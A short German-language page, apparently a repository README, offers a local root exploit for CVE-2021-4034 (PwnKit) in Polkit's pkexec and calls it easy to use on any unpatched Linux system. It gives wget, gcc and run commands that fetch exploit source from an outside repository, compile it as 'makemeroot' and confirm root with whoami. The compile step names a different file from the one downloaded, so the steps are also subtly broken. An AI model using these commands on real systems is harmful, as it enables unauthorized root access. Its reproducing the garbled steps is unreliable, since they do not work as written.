
Lokaler Privilege-Escalation-Exploit für CVE-2021-4034 (PWNKIT), der auf Polkit's pkexec abzielt und es unprivilegierten Benutzern ermöglicht, auf verwundbaren Linux-Systemen Root-Rechte zu erlangen.
CVE-2021-4034 (PWNKIT)
Eine Speicherkorruptions-Schwachstelle in Polkit's pkexec, die es jedem nicht privilegierten Benutzer ermöglicht, auf einem verwundbaren System mit der Standard-Polkit-Konfiguration volle Root-Rechte zu erlangen.
Einfach zu verwenden, lokale Rechteausweitung auf jedem nicht gepatchten Linux-System.
wget https://gitlab.com/nelox/pwnkit-vulnerability/blasty-vs-pkexec.c
gcc bblasty-vs-pkexec.c -o makemeroot
./makemeroot
whoami